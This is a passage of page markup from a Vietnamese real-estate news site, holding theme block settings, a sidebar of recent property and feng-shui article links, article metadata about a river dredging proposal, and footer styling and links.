'{"modules_on_row":"eyJwaG9uZSI6IjEwMCUifQ==","image_floated":"float_left","image_width":"30","image_height":"100","show_btn":"none","show_excerpt":"none","modules_category":"above","show_date":"none","show_review":"none","show_com":"none","show_author":"none","meta_padding":"eyJhbGwiOiIwIDAgMCAxNXB4IiwicG9ydHJhaXQiOiIwIDAgMCAxMHB4In0=","art_title":"eyJhbGwiOiI4cHggMCAwIDAiLCJwb3J0cmFpdCI6IjVweCAwIDAgMCJ9","f_title_font_family":"712","f_title_font_size":"eyJhbGwiOiIxNSIsInBvcnRyYWl0IjoiMTEifQ==","f_title_font_weight":"500","f_title_font_line_height":"1.2","title_txt":"#000000","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","f_cat_font_family":"712","f_cat_font_transform":"uppercase","f_cat_font_weight":"400","f_cat_font_size":"11","modules_category_padding":"0","all_modules_space":"eyJhbGwiOiIyNCIsInBvcnRyYWl0IjoiMTUiLCJsYW5kc2NhcGUiOiIyMCJ9","category_id":"","ajax_pagination":"load_more","sort":"","title_txt_hover":"#008d7f","tdc_css":"eyJwaG9uZSI6eyJtYXJnaW4tYm90dG9tIjoiNDAiLCJkaXNwbGF5IjoiIn0sInBob25lX21heF93aWR0aCI6NzY3LCJhbGwiOnsiZGlzcGxheSI6IiJ9LCJwb3J0cmFpdCI6eyJkaXNwbGF5IjoiIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3Njh9","cat_txt":"#000000","cat_txt_hover":"#008d7f","f_more_font_weight":"","f_more_font_transform":"","f_more_font_family":"","image_size":"td_150x0","f_meta_font_family":"712","custom_title":"B\u00e0i \u0111\u0103ng m\u1edbi","block_template_id":"td_block_template_8","border_color":"#008d7f","art_excerpt":"0","meta_info_align":"center","f_cat_font_line_height":"1","pag_h_bg":"#008d7f","image_radius":"100%","td_ajax_filter_type":"","f_header_font_size":"eyJhbGwiOiIxNyIsInBvcnRyYWl0IjoiMTUifQ==","f_header_font_weight":"500","f_header_font_transform":"uppercase","f_header_font_family":"712","pag_h_border":"#008d7f","block_type":"td_flex_block_1","separator":"","custom_url":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","mc1_el":"","post_ids":"-1807","category_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","limit":"5","offset":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","el_class":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","container_width":"","modules_gap":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","hide_image":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","meta_info_horiz":"layout-default","meta_width":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_margin":"","modules_cat_border":"","modules_category_radius":"0","show_cat":"inline-block","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","show_audio":"block","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_size":"","f_meta_font_line_height":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_weight":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_bg":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_border":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_130","tdc_css_class":"tdi_130","tdc_css_class_style":"tdi_130_rand_style"}'; block_tdi_130.td_column_number = "1"; block_tdi_130.block_type = "td_flex_block_1"; block_tdi_130.post_count = "5"; block_tdi_130.found_posts = "585"; block_tdi_130.header_color = ""; block_tdi_130.ajax_pagination_infinite_stop = ""; block_tdi_130.max_num_pages = "117"; tdBlocksArray.push(block_tdi_130); </script><div class="td-block-title-wrap"><h4 class="td-block-title"><span>Bài đăng mới</span></h4></div><div id=tdi_130 class="td_block_inner td-mc1-wrap"> <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack "> <div class="td-module-container td-category-pos-above"> <div class="td-image-container"> <div class="td-module-thumb"><a href="https://tuvanbds.net/2022/10/25/tien-nhan-roi-nen-dau-tu-bat-dong-san-gi/" rel=" bookmark" class="td-image-wrap " title="Tiền nhàn rỗi nên đầu tư bất động sản gì." ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://tuvanbds.net/wp-content/uploads/2022/10/nova-phan-thiet-1-1-150x84.jpg" ></span></a></div> </div> <div class="td-module-meta-info"> <a href="https://tuvanbds.net/category/dau-tu/" class="td-post-category">Đầu tư</a> <h3 class="entry-title td-module-title"><a href="https://tuvanbds.net/2022/10/25/tien-nhan-roi-nen-dau-tu-bat-dong-san-gi/" rel="bookmark" title="Tiền nhàn rỗi nên đầu tư bất động sản gì.">Tiền nhàn rỗi nên đầu tư bất động sản gì.</a></h3> <div class="td-editor-date"> <span class="td-author-date"> </span> </div> </div> </div> </div> <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack "> <div class="td-module-container td-category-pos-above"> <div class="td-image-container"> <div class="td-module-thumb"><a href="https://tuvanbds.net/2022/10/12/cau-hoi-ma-nhan-vien-moi-gioi-bat-dong-san-nhan-duoc-nhieu-nhat/" rel=" bookmark" class="td-image-wrap " title="Câu hỏi mà nhân viên môi giới bất động sản nhận được nhiều nhất." ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://tuvanbds.net/wp-content/uploads/2022/10/moi-gioi-nha-dat-1-150x100.jpg" ></span></a></div> </div> <div class="td-module-meta-info"> <a href="https://tuvanbds.net/category/phap-ly-bat-dong-san/" class="td-post-category">Pháp lý bất động sản</a> <h3 class="entry-title td-module-title"><a href="https://tuvanbds.net/2022/10/12/cau-hoi-ma-nhan-vien-moi-gioi-bat-dong-san-nhan-duoc-nhieu-nhat/" rel="bookmark" title="Câu hỏi mà nhân viên môi giới bất động sản nhận được nhiều nhất.">Câu hỏi mà nhân viên môi giới bất động sản nhận được nhiều nhất.</a></h3> <div class="td-editor-date"> <span class="td-author-date"> </span> </div> </div> </div> </div> <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack "> <div class="td-module-container td-category-pos-above"> <div class="td-image-container"> <div class="td-module-thumb"><a href="https://tuvanbds.net/2022/09/27/tranh-pham-toi-ky-khi-dat-giuong-ngu-trong-phong-thuy/" rel=" bookmark" class="td-image-wrap " title="Tránh phạm tối kỵ khi đặt giường ngủ trong phong thủy." ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://tuvanbds.net/wp-content/uploads/2022/09/phong-thuy-giuong-ngu-1-150x150.jpg" ></span></a></div> </div> <div class="td-module-meta-info"> <a href="https://tuvanbds.net/category/nha-dep/" class="td-post-category">Nhà đẹp</a> <h3 class="entry-title td-module-title"><a href="https://tuvanbds.net/2022/09/27/tranh-pham-toi-ky-khi-dat-giuong-ngu-trong-phong-thuy/" rel="bookmark" title="Tránh phạm tối kỵ khi đặt giường ngủ trong phong thủy.">Tránh phạm tối kỵ khi đặt giường ngủ trong phong thủy.</a></h3> <div class="td-editor-date"> <span class="td-author-date"> </span> </div> </div> </div> </div> <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack "> <div class="td-module-container td-category-pos-above"> <div class="td-image-container"> <div class="td-module-thumb"><a href="https://tuvanbds.net/2022/09/22/khach-san-resort-doi-dien-nguy-co-thua-cung/" rel=" bookmark" class="td-image-wrap " title="Khách sạn, resort đối diện nguy cơ thừa cung." ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://tuvanbds.net/wp-content/uploads/2022/09/thua-cung-bat-dong-san-1-1-150x100.jpg" ></span></a></div> </div> <div class="td-module-meta-info"> <a href="https://tuvanbds.net/category/dau-tu/" class="td-post-category">Đầu tư</a> <h3 class="entry-title td-module-title"><a href="https://tuvanbds.net/2022/09/22/khach-san-resort-doi-dien-nguy-co-thua-cung/" rel="bookmark" title="Khách sạn, resort đối diện nguy cơ thừa cung.">Khách sạn, resort đối diện nguy cơ thừa cung.</a></h3> <div class="td-editor-date"> <span class="td-author-date"> </span> </div> </div> </div> </div> <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack "> <div class="td-module-container td-category-pos-above"> <div class="td-image-container"> <div class="td-module-thumb"><a href="https://tuvanbds.net/2022/09/09/bo-xay-dung-noi-ve-viec-dat-coc-mua-ban-nha-dat-phai-thanh-toan-qua-ngan-hang/" rel=" bookmark" class="td-image-wrap " title="Bộ Xây dựng nói về việc đặt cọc, mua bán nhà đất phải thanh toán qua ngân hàng." ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://tuvanbds.net/wp-content/uploads/2022/09/dat-coc-mua-nha-dat-1-1-150x189.jpg" ></span></a></div> </div> <div class="td-module-meta-info"> <a href="https://tuvanbds.net/category/phap-ly-bat-dong-san/" class="td-post-category">Pháp lý bất động sản</a> <h3 class="entry-title td-module-title"><a href="https://tuvanbds.net/2022/09/09/bo-xay-dung-noi-ve-viec-dat-coc-mua-ban-nha-dat-phai-thanh-toan-qua-ngan-hang/" rel="bookmark" title="Bộ Xây dựng nói về việc đặt cọc, mua bán nhà đất phải thanh toán qua ngân hàng.">Bộ Xây dựng nói về việc đặt cọc, mua bán nhà đất phải thanh toán qua ngân hàng.</a></h3> <div class="td-editor-date"> <span class="td-author-date"> </span> </div> </div> </div> </div> </div><div class="td-load-more-wrap"><a href="#" class="td_ajax_load_more td_ajax_load_more_js" aria-label="load_more" id="next-page-tdi_130" data-td_block_id="tdi_130">Load more<i class="td-icon-font td-icon-menu-down"></i></a></div></div></div></div></div></div></div></div> <span class="td-page-meta" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="admin"><meta itemprop="url" content="https://tuvanbds.net/author/admin/"></span><meta itemprop="datePublished" content="2022-04-08T12:58:46+00:00"><meta itemprop="dateModified" content="2022-04-08T12:58:46+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://tuvanbds.net/2022/04/08/kien-nghi-khong-dao-moi-21km-noi-song-long-tau-va-soai-rap/"/><span class="td-page-meta" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://tuvanbds.net/2022/04/08/kien-nghi-khong-dao-moi-21km-noi-song-long-tau-va-soai-rap/"></span><meta itemprop="name" content="Tuvanbds.net"></span><meta itemprop="headline" content="Kiến nghị không đào mới 2,1km nối sông Lòng Tàu và Soài Rạp"><span class="td-page-meta" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://tuvanbds.net/wp-content/uploads/2022/04/nao-vet-soai-rap-nban-1jpg-1591943883065230598374-1649419476242238316683-crop-16494194911601955438112.jpg"><meta itemprop="width" content="600"><meta itemprop="height" content="315"></span> </article> </div> </div> </div> <!-- #tdb-autoload-article --> <div class="td-footer-template-wrap" style="position: relative"> <div class="td-footer-wrap "> <div id="tdi_131" class="tdc-zone"><div class="tdc_zone tdi_132 wpb_row td-pb-row" > <style scoped> /* custom css */ .tdi_132{ min-height: 0; } /* inline tdc_css att */ .tdi_132{ margin-right:auto !important; margin-left:auto !important; width:1164px !important; } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px) { .tdi_132{ width:100% !important; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .tdi_132{ width:100% !important; } } /* phone */ @media (max-width: 767px) { .tdi_132{ width:100% !important; } } </style><div id="tdi_133" class="tdc-row"><div class="vc_row tdi_134 wpb_row td-pb-row tdc-element-style" > <style scoped> /* custom css */ .tdi_134, .tdi_134 .tdc-columns{ min-height: 0; }.tdi_134, .tdi_134 .tdc-columns{ display: block; }.tdi_134 .tdc-columns{ width: 100%; } /* inline tdc_css att */ .tdi_134{ padding-top:60px !important; padding-bottom:60px !important; position:relative; } .tdi_134 .td_block_wrap{ text-align:left } /* phone */ @media (max-width: 767px) { .tdi_134{ padding-top:40px !important; padding-bottom:40px !important; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .tdi_134{ padding-top:40px !important; padding-bottom:40px !important; } } </style> <div class="tdi_133_rand_style td-element-style" ><div class="td-element-style-before"><style> .tdi_133_rand_style > .td-element-style-before { content:'' !important; width:100% !important; height:100% !important; position:absolute !important; top:0 !important; left:0 !important; display:block !important; z-index:0 !important; background-image:url("https://toancanh.xyz/wp-content/uploads/2022/09/3.jpg") !important; background-position:center center !important; opacity:0.2 !important; background-size:cover !important; } </style></div><style> .tdi_133_rand_style{ background-color:#232d35 !important; } </style></div><div class="vc_column tdi_136 wpb_column vc_column_container tdc-column td-pb-span12"> <style scoped> /* custom css */ .tdi_136{ vertical-align: baseline; }.tdi_136 > .wpb_wrapper, .tdi_136 > .wpb_wrapper > .tdc-elements{ display: block; }.tdi_136 > .wpb_wrapper > .tdc-elements{ width: 100%; }.tdi_136 > .wpb_wrapper > .vc_row_inner{ width: auto; }.tdi_136 > .wpb_wrapper{ width: auto; height: auto; } </style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_logo tdi_137 td-pb-border-top td_block_template_1 tdb-header-align" data-td-block-uid="tdi_137" > <style> /* inline tdc_css att */ .tdi_137{ margin-bottom:40px !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .tdi_137{ margin-bottom:30px !important; } } /* phone */ @media (max-width: 767px) { .tdi_137{ margin-bottom:25px !important; } } </style> <style> /* custom css */ .tdi_137 .tdb-logo-a, .tdi_137 h1{ align-items: flex-start; justify-content: center; }.tdi_137 .tdb-logo-svg-wrap{ display: block; }.tdi_137 .tdb-logo-svg-wrap + .tdb-logo-img-wrap{ display: none; }.tdi_137 .tdb-logo-img-wrap{ display: block; }.tdi_137 .tdb-logo-text-tagline{ margin-top: 2px; margin-left: 0; display: none; }.tdi_137 .tdb-logo-text-title{ display: none; }.tdi_137 .tdb-logo-text-wrap{ flex-direction: column; align-items: flex-start; }.tdi_137 .tdb-logo-icon{ top: 0px; display: block; } </style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://tuvanbds.net/"><span class="tdb-logo-img-wrap"><img class="tdb-logo-img" src="https://tuvanbds.net/wp-content/uploads/2022/09/LOGO-TUVANBDSNET-1.png" alt="Logo" title="" width="503" height="54" /></span></a></div></div> <!-- ./block --><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_138 td-pb-border-top td_block_template_1" data-td-block-uid="tdi_138" > <style> /* inline tdc_css att */ .tdi_138{ width:72% !important; } /* phone */ @media (max-width: 767px) { .tdi_138{ width:100% !important; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .tdi_138{ width:80% !important; } } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px) { .tdi_138{ width:78% !important; } } </style> <style> /* custom css */ .tdm_block.tdm_block_inline_text{ margin-bottom: 0; vertical-align: top; }.tdm_block.tdm_block_inline_text .tdm-descr{ margin-bottom: 0; -webkit-transform: translateZ(0); transform: translateZ(0); }.tdc-row-content-vert-center .tdm-inline-text-yes{ vertical-align: middle; }.tdc-row-content-vert-bottom .tdm-inline-text-yes{ vertical-align: bottom; }.tdi_138{ text-align: center !important; margin-right: auto; margin-left: auto; }.tdi_138 .tdm-descr{ color: #eaeaea; font-family:Rubik !important;font-size:13px !important;line-height:1.6 !important;font-weight:400 !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .tdi_138 .tdm-descr{ font-family:Rubik !important;font-size:11px !important;line-height:1.6 !important;font-weight:400 !important; } } </style><p class="tdm-descr">Cập nhật thực trạng thị trường bất động sản hiện nay, cung cấp cho các độc giả những thông tin chính xác và những góc nhìn phân tích nhận định về thị trường bất động sản từ các chuyên gia trong ngành.</p></div><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_139 td-pb-border-top td_block_template_1" data-td-block-uid="tdi_139" > <style> /* inline tdc_css att */ .tdi_139{ margin-top:20px !important; margin-bottom:15px !important; padding-right:10% !important; padding-left:10% !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .tdi_139{ margin-top:15px !important; margin-bottom:10px !important; } } </style> <style> /* custom css */ .tdi_139{ text-align: center !important; margin-right: auto; margin-left: auto; }.tdi_139 .tdm-descr{ color: #eaeaea; font-family:Rubik !important;font-size:13px !important;line-height:1.2 !important; }.tdi_139 .tdm-descr a{ color: #008d7f; } </style><p class="tdm-descr">Liên hệ với chúng tôi: <a href="mailto:contact@yoursite.com">tuvanbds@gmail.com</a></p></div><div class="tdm_block td_block_wrap tdm_block_socials tdi_140 tdm-content-horiz-center td-pb-border-top td_block_template_1" data-td-block-uid="tdi_140" > <style> .tdi_141 .tdm-social-item i{ font-size: 14px; vertical-align: middle; line-height: 39.2px; }.tdi_141 .tdm-social-item i.td-icon-twitter, .tdi_141 .tdm-social-item i.td-icon-linkedin, .tdi_141 .tdm-social-item i.td-icon-pinterest, .tdi_141 .tdm-social-item i.td-icon-blogger, .tdi_141 .tdm-social-item i.td-icon-vimeo{ font-size: 11.2px; }.tdi_141 .tdm-social-item{ width: 39.2px; height: 39.2px; margin: 7px 14px 7px 0; background: rgba(255,255,255,0.03); }.tdi_141 .tdm-social-item-wrap:last-child .tdm-social-item{ margin-right: 0 !important; }.tdi_141 .tdm-social-item i, .tds-team-member2 .tdi_141.tds-social4 .tdm-social-item i{ color: #ffffff; }body .tdi_141 .tdm-social-item{ border: 1px solid rgba(203,149,88,0.03); }.tdi_141 .tdm-social-text{ display: none; margin-left: 2px; margin-right: 18px; } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px){ body .tdi_141 .tdm-social-item{ border: 1px solid rgba(203,149,88,0.03); } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ body .tdi_141 .tdm-social-item{ border: 1px solid rgba(203,149,88,0.03); } } /* phone */ @media (max-width: 767px){ body .tdi_141 .tdm-social-item{ border: 1px solid rgba(203,149,88,0.03); } } </style><div class="tdm-social-wrapper tds-social4 tdi_141"><div class="tdm-social-item-wrap"><a href="#" title="Facebook" class="tdm-social-item"><i class="td-icon-font td-icon-facebook"></i></a><a href="#" class="tdm-social-text">Facebook</a></div><div class="tdm-social-item-wrap"><a href="#" title="Instagram" class="tdm-social-item"><i class="td-icon-font td-icon-instagram"></i></a><a href="#" class="tdm-social-text">Instagram</a></div><div class="tdm-social-item-wrap"><a href="#" title="Linkedin" class="tdm-social-item"><i class="td-icon-font td-icon-linkedin"></i></a><a href="#" class="tdm-social-text">Linkedin</a></div><div class="tdm-social-item-wrap"><a href="#" title="Pinterest" class="tdm-social-item"><i class="td-icon-font td-icon-pinterest"></i></a><a href="#" class="tdm-social-text">Pinterest</a></div><div class="tdm-social-item-wrap"><a href="#" title="Tumblr" class="tdm-social-item"><i class="td-icon-font td-icon-tumblr"></i></a><a href="#" class="tdm-social-text">Tumblr</a></div><div class="tdm-social-item-wrap"><a href="#" title="Twitter" class="tdm-social-item"><i class="td-icon-font td-icon-twitter"></i></a><a href="#" class="tdm-social-text">Twitter</a></div></div></div></div></div></div></div><div id="tdi_142" class="tdc-row"><div class="vc_row tdi_143 wpb_row td-pb-row tdc-element-style tdc-row-content-vert-center" > <style scoped> /* custom css */ .tdi_143, .tdi_143 .tdc-columns{ min-height: 0; }.tdi_143, .tdi_143 .tdc-columns{ display: block; }.tdi_143 .tdc-columns{ width: 100%; }@media (min-width: 767px) { .tdi_143.tdc-row-content-vert-center, .tdi_143.tdc-row-content-vert-center .tdc-columns { display: flex; align-items: center; flex: 1; } .tdi_143.tdc-row-content-vert-bottom, .tdi_143.tdc-row-content-vert-bottom .tdc-columns { display: flex; align-items: flex-end; flex: 1; } .tdi_143.tdc-row-content-vert-center .td_block_wrap { vertical-align: middle; } .tdi_143.tdc-row-content-vert-bottom .td_block_wrap { vertical-align: bottom; } } /* inline tdc_css att */ .tdi_143{ padding-top:8px !important; padding-bottom:8px !important; position:relative; } .tdi_143 .td_block_wrap{ text-align:left } /* phone */ @media (max-width: 767px) { .tdi_143{ padding-top:10px !important; padding-bottom:5px !important; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .tdi_143{ padding-top:6px !important; padding-bottom:6px !important; } } </style> <div class="tdi_142_rand_style td-element-style" ><style> .tdi_142_rand_style{ background-color:#11171c !important; } </style></div><div class="vc_column tdi_145 wpb_column vc_column_container tdc-column td-pb-span6"> <style scoped> /* custom css */ .tdi_145{ vertical-align: baseline; }.tdi_145 > .wpb_wrapper, .tdi_145 > .wpb_wrapper > .tdc-elements{ display: block; }.tdi_145 > .wpb_wrapper > .tdc-elements{ width: 100%; }.tdi_145 > .wpb_wrapper > .vc_row_inner{ width: auto; }.tdi_145 > .wpb_wrapper{ width: auto; height: auto; } /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .tdi_145{ margin-bottom:8px !important; } } </style><div class="wpb_wrapper"><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_146 td-pb-border-top td_block_template_1" data-td-block-uid="tdi_146" > <style> /* inline tdc_css att */ /* phone */ @media (max-width: 767px) { .tdi_146{ margin-top:0px !important; justify-content:center !important; text-align:center !important; } } </style> <style> /* custom css */ .tdi_146{ text-align: left !important; }.tdi_146 .tdm-descr{ color: #cccccc; font-family:Rubik !important;font-size:13px !important;line-height:1.2 !important; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .tdi_146 .tdm-descr{ font-family:Rubik !important;font-size:11px !important;line-height:1.2 !important; } } </style><p class="tdm-descr">© Copyright - Tuvanbds.net</p></div></div></div><div class="vc_column tdi_148 wpb_column vc_column_container tdc-column td-pb-span6"> <style scoped> /* custom css */ .tdi_148{ vertical-align: baseline; }.tdi_148 > .wpb_wrapper, .tdi_148 > .wpb_wrapper > .tdc-elements{ display: block; }.tdi_148 > .wpb_wrapper > .tdc-elements{ width: 100%; }.tdi_148 > .wpb_wrapper > .vc_row_inner{ width: auto; }.tdi_148 > .wpb_wrapper{ width: auto; height: auto; } /* inline tdc_css att */ .tdi_148{ justify-content:flex-end !important; text-align:right !important; } /* phone */ @media (max-width: 767px) { .tdi_148{ justify-content:center !important; text-align:center !important; } } </style><div class="wpb_wrapper"><div class="td_block_wrap td_block_list_menu tdi_149 td-pb-border-top td_block_template_1 widget" data-td-block-uid="tdi_149" > <style> /* inline tdc_css att */ .tdi_149{ margin-bottom:0px !important; } /* desktop */ @media(min-width: 1141px) { .tdi_149 { display:inline-table !important; } } /* phone */ @media (max-width: 767px) { .tdi_149{ display:inline-block !important; } } /* portrait */ @media (min-width: 768px) and (max-width: 1018px) { .tdi_149{ display:inline-table !important; } } /* landscape */ @media (min-width: 1019px) and (max-width: 1140px) { .tdi_149{ display:inline-table !important; } } </style> <style> /* custom css */ .td_block_list_menu ul{ flex-wrap: wrap; margin-left: 12px; }.td_block_list_menu ul li{ margin-left: 0; }.td_block_list_menu .sub-menu{ padding-left: 22px; }.td_block_list_menu .sub-menu li{ font-size: 13px; }.td_block_list_menu li.current-menu-item > a, .td_block_list_menu li.current-menu-ancestor > a, .td_block_list_menu li.current-category-ancestor > a{ color: #4db2ec; }.tdi_149 li{ display: inline-block; font-family:Rubik !important;font-size:13px !important;line-height:1.2 !important; }.tdi_149 .menu{ display: flex; }.tdi_149 .sub-menu{ display: none; }.tdi_149 ul{ margin: 0px; text-align: left; justify-content: flex-start; }.tdi_149 ul li{ margin-right: 16px; }.tdi_149 ul li:last-child{ margin-right: 0; }.tdi_149 a{ color: #cccccc; }.tdi_149 li.current-menu-item > a, .tdi_149 li.current-menu-ancestor > a, .tdi_149 li.current-category-ancestor > a, .tdi_149 a:hover{ color: #ffffff; } /* portrait */ @media (min-width: 768px) and (max-width: 1018px){ .tdi_149 li{ font-family:Rubik !important;font-size:11px !important;line-height:1.2 !important; } } </style><div class="td-block-title-wrap"></div><div id=tdi_149 class="td_block_inner td-fix-index"><div class="menu-td-demo-custom-menu-container"><ul id="menu-td-demo-custom-menu-1" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-123"><a href="https://tuvanbds.net/gioi-thieu/">Giới thiệu</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-124"><a href="https://tuvanbds.net/lien-he/">Liên hệ</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5415"><a href="https://tuvanbds.net/chinh-sach-bao-mat/">Chính sách bảo mật</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5485"><a href="https://tuvanbds.net/mien-tru-trach-nhiem/">Miễn trừ trách nhiệm</a></li> </ul></div></div></div></div></div></div></div></div></div> </div> </div> <style> .tdc-footer-template .td-main-content-wrap { padding-bottom: 0; } </style> </div><!--close td-outer-wrap--> <!-- Theme: Newspaper by tagDiv.com 2022 Version: 11.5.1 (rara) Deploy mode: deploy uid: 6385babe468b6 --> <!-- Custom css from theme panel --> <style type="text/css" media="screen"> /* custom css theme panel */ .tdc-font-tdmp { font-family: td-multipurpose; } </style> <script 